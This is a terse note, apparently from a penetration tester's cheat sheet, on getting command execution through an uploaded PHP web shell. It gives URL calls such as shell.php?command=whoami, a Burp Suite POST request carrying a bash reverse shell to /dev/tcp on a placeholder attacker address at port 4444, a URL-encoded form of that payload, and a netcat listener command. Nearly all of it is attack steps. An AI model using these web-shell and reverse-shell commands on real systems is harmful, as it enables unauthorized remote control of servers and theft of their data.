PHP

Upload php code exec script

• File.php =
• In url
• http://x.x.x.x/File.php?msx=whoami

https://www.acunetix.com/websitesecurity/php-security-2/

PHP shell

in url go to shell.php?command=whoami

In Burpsuite create post request

POST /url/shell.php HTTP/1.1 content command=bash -c ‘bash -i >& /dev/tcp/x.x.x.x/4444 0>&1′

URL encode it to command=bash+-c+’bash+-i+>%26+/dev/tcp/x.x.x.x/4444+0>%261’

Setup NC to listen for incoming connections nc -lvnp x.x.x.x 4444